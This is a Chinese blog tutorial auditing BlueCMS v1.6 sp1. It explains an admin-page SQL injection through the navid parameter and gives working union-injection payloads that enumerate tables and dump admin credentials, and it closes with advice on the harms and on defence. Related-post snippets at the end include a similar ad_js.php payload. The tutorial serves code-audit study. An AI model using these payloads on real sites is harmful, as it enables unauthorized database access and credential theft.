bluecms 手把手教你0day挖掘-基础入门篇

已于 2022-03-25 10:24:49 修改
阅读量5.4k 收藏 6
点赞数
文章标签: web安全 sql
于 2022-03-15 17:15:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/G208_522/article/details/123507319
版权

Bluecms后台sql注入漏洞

一、环境搭建

1、PhP地方门户系统 BlueCMS v1.6 sp1

下载地址:https://down.chinaz.com/soft/26181.htm

2、PHPstudy apache,mysql集成环境

二、代码审计

在该cms系统中,其后台存在sql注入漏洞
在这里插入图片描述

这里直接拼接了前端接受的参数navid,我们可以直接控制传入参数导致sql注入漏洞产生。

img

这里对传入的参数进行了过滤,其中addslashes()函数,返回在预定义字符之前添加反斜杠的字符串,预定义字符有,单引号,双引号,反斜杠,null等,这里sql语句为数字型注入,该过滤无效。

在这里插入图片描述

这里判断传入的参数是否是数组,若不是数组直接使用addslashes()函数进行过滤。

img

img

整个sql语句执行过程中只对传入参数使用addslashes()函数进行了过滤,后续并没有进行其他过滤。这里存在sql 注入漏洞

三、漏洞利用

1、正常payload :

http://www.bluecms.com:8001/admin/nav.php?act=edit&navid=1

在这里插入图片描述

返回正常页面

2、猜列数payload:

http://www.bluecms.com:8001/admin/nav.php?act=edit&navid=1 order by 6

得出列数为6

3、union注入payload:

http://www.bluecms.com:8001/admin/nav.php?act=edit&navid=-1 union select 1,version(),database(),4,user(),6

img

4、爆表名payload:

http://www.bluecms.com:8001/admin/nav.php?act=edit&navid=-1 union select 1,group_concat(table_name),database(),4,5,6 from information_schema.tables where table_schema=database()

在这里插入图片描述

5、爆列名payload:

http://www.bluecms.com:8001/admin/nav.php?act=edit&navid=-1 union select 1,group_concat(column_name),database(),4,5,6 from information_schema.columns where table_name=0x626C75655F61646D696E

这里我们选择了blue_admin这个表

img

6、爆数据 payload:

http://www.bluecms.com:8001/admin/nav.php?act=edit&navid=-1 union select 1,group_concat(admin_name),group_concat(pwd),4,5,6 from blue_admin

在这里插入图片描述

7、管理员密码被MD5加密,解密后得admin

在这里插入图片描述

四、漏洞危害

(1)攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。

(2)可以对数据库的数据进行增加或删除操作,例如私自添加或删除管理员账号。

(3)如果网站目录存在写入权限,可以写入网页木马。攻击者进而可以对网页进行篡改,发布一些违法信息等。

(4)经过提权等步骤,服务器最高权限被攻击者获取。攻击者可以远程控制服务器,安装后门,得以修改或控制操作系统。

五、漏洞防御

(1)基于攻击特征的匹配过滤。这是目前使用最为广泛的方式,系统会将攻击特征做成数据库,一旦匹配到这些攻击特征就会认定检测到SQL注入。这种方式可以有效的过滤大部分SQL注入攻击,但是大大增加了程序的复杂度,同时可能影响到业务的正常查询。

(2)对用户输入进行转义。例如,常见的SQL注入语句中都含有“‘’”,通过转义将“‘’”转义为“/”,SQL注入语句就会达不到攻击者预期的执行效果,从而实现对SQL注入进行防御。

(3)数据类型进行严格定义,数据长度进行严格规定。比如查询数据库某条记录的id,定义它为整型,如果用户传来的数据不满足条件,要对数据进行过滤。数据长度也应该做严格限制,可以防止较长的SQL注入语句。

(4)严格限制网站访问数据库的权限。

高小白—专业摸鱼
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
万变不离其宗-掌控者靶场之bluecms1.6漏洞
cainsoftware的博客
07-26 2557
拿到题 睁大眼就能看见底下的 bluecms 1.6 百度了一下漏洞位置 学习了PW的姿势 SQL注入位置 http://59.63.200.79:8003/bluecms/uploads/ad_js.php?ad_id=1 Order by 7 字段长度为7 注入表名payload: ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,group_concat(table_name)%20from%20information_sc..
bluecms代码审计入门
qq_42307546的博客
06-27 658
php
49-渗透测试模拟实战(二)-BlueCMS平台
最新发布
XLbb的博客
06-10 1151
渗透测试是维护的重要组成部分,可以帮助组织识别并修复潜在的安全漏洞,减少被恶意攻击的风险。然而,进行渗透测试时必须遵守法律和道德规范,确保所有活动都在授权范围内进行。
生命在于折腾——BlueCMS代码审计
易水哲的博客
09-23 915
BlueCMS代码审计
0day防御技术思考
SHELLCODE_8BIT的博客
12-31 615
比较难,所以白名单是更低成本防护手段。3.4 通过多手段补充,对于单一检出手段检出率,那么多余多手段,也就是一个攻击者通过0day进来,之后后续攻击都能够被捕获,那么通过事件的关联,来绘制整个攻击图谱,也是可以帮助0day溯源,也就是说产品要有攻击关联的能力,和威胁记录的能力,否则就抓不到0day的攻击特征。首先什么是0day,也就是没有被捕获到的漏洞,那么说明该攻击不在特征库,当然也不绝对,也可能会和其他攻击类型相似,而最终被捕获,但是我们这里思考一种方案,能不能找到一些很好的方法去防御这样的漏洞。
bluecms 1.6 审计与渗透测试
feng的博客
05-07 1763
前言 听My0n9s师傅说bluecms比较适合审计入门,正好也到了2周审计一个CMS的时候了,就从网上下载了这个CMS的源码,开始审计与渗透测试。 源码下载: bluecmd 安装 安装的时候主要先看看哪些目录是可写的,到时候如果可以传马或者SQL注入可以写马啥的,至少对于可用的目录知道一些。而且也大致看一下,cache是缓存,upload估计就是上传的路径了,backup是备份,说不定可能存在源码泄露啥的,complie就不清楚了,好像就是smarty?。 之后就是正常的安装,而且安装那里的用户名和密
Damicms漏洞挖掘
huohaowen的博客
01-18 895
本篇文章主要记录了对damicms的漏洞挖掘
bluecms企业网站 asp版 v1.0-ASP源码.zip
12-13
ASP源码,压缩包解压密码:www.cqlsoft.com
【原创】] Bluecms 0day 大集合.docx
11-29
cms 0day 大集合 【原创】] Bluecms 0day 大集合.docx
PHP地方门户系统-BlueCMS v1.6 sp1.rar
07-07
bluecms v1.6 升级到 bluecms v1.6 sp1版说明: 解决问题: 1.修正所有已知错误 2.前后台整合通用编辑器fckeditor,替换之前的editor 3.增加前台发布新闻过滤 4.增加禁止词语过滤 5.增加同一用户注册时间间隔...
bluecms-zzcms.rar
06-09
"bluecms-zzcms.rar"这个压缩包包含两个流行的开源内容管理系统(CMS)——BlueCMS v1.6 sp1和ZZCMS 8.2的源代码,这两个系统被广泛用于搭建网站,同时也被用作初学者进行代码审计的实例。 **BlueCMS v1.6 sp1** ...
bluecms企业网站 v1.0
10-16
bluecms企业网站是一个以asp+access进行开发的企业建站cms。bluecms介绍:1、BlueCMS核心程序不超过200K,全部由自定义系统写成,本程序最大的特点就是不用担心升级的问题,所有版本自动升级,所有高级版本标签都兼容低级版本标签2、支持栏目自定义字段和项目自定义字段3、多语言+wap4、后台用户名:admin 密码:123456提示:打开网站后,直接进入后台,点击右上角生成PC中的生成首页,即可在根目录下打开网站首页页面。2016-2-17 15:00修复了一个小错误
BlueCMS漏洞大集合
02-03
client_ip伪造注入看代码吧,这里的getip函数是获取Ip的,由于,client_ip和x_forwarded_for都可以伪造。...看看结果可以看到了么?已经是注入了问题这里的是报错是。。...但是这样子太麻烦了。之前,我一直在想啊,想啊,...
Bluecms后台任意修改文件getshell
kiwi的博客
10-26 1574
前几天在入门代码审计的时候,拿bluecms学习,偶然在百度上面找到一篇文章是写bluecms拿shell的,就学习了一下,我认为应该有部分cms也存在此漏洞,可能文章有不足的地方欢迎师傅们批评指正。
漏洞挖掘经验分享
qq_53058639的博客
03-15 1473
之前运气好,挖到的一个洞的思路就分享给大家,首先是通过一个很微小的信息泄露在http的响应头中,找到了他们使用的cms版本号,后来通过搜索市面上的漏洞,发现最新版的问题都不存在了,后来又下载了最新的源码进行了代码审计,然后正好那段时间在学,就发现了个sql注入点。3.找大师傅们尽量听他们给的建议,或者给你的规划,而不是说一味的去问怎么挖洞,这种问题就相当于,一个小孩还不会写字,在让你他写作文一样,毫无意义,这个过程需要自己慢慢的积累和学习,而不是让别人喂,来让别人施舍,只会让别人看不起自己!
代码审计学习-BlueCMS框架代码审计
Alexhirchi的博客
11-05 1333
第一次的代码审计--BlueCMS代码审计 之前总说要学习代码审计,但每次面对大量代码时,又没什么开发经验,都是浅尝即止,面对几千行的代码毫无开始的头绪。(看来又印证了那句话:基础决定上层建筑)作为萌新 最开始我还是先去看了许多大佬的文章,了解一下他们的学习路线,并且学习了一些新的思路。这次挑了个小众的CMS入手–BlueCMS作为我的代码审计开始,顺便分享一些自己的总结。 环境配置: BlueCMS v1.6 sp1 windows7 PHP 5.4.45 + Apache +mysql 5.7..
bluecmsv1.6代码审计
qq_42307546的博客
06-28 708
php
bluecms1.6sp1(还是白盒入门)
Npceer-一位网安初学者的博客
10-02 1771
Bluecmssql注入ad_js.php存在sql注入XFF伪造/guest_book.php 再来一个入门级别的cms 然后就进入tp的复现了 直接开始吧 环境就不解释了 网上找个源码下载 找不到私聊我要也行 sql注入 先自己看看 seay放一边 等会在回来 ad_js.php存在sql注入 发现没啥过滤 trim去个空格没啥用 order by 7 时候不报错 直接联合注入 往下注注不动了 我好久不写sql注入了 这单引号进去被转义了咋办啊 改反引号没用 不知道为啥 有没有大佬解释一下的 解
代码审计之bluecms1.6后台SQL注入
Kr的博客
11-07 1018
bluecm1.6版本后台存在SQL注入 漏洞点链接: http://127.0.0.1/bluecms_v1.6_sp1/uploads/admin/nav.php?act=edit&navid=1 代码: elseif($act=='edit') { $sql = "select * from ".table('navigate')." where navid = "...
bluecms网站搭建
09-18
2. 接下来,你需要下载bluecms的安装包,并解压到你的服务器目录下,比如wwwroot文件夹。 3. 打开解压后的文件夹,找到config文件夹,并打开其中的conn.asp文件。在该文件中,你需要根据你的服务器配置修改数据库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值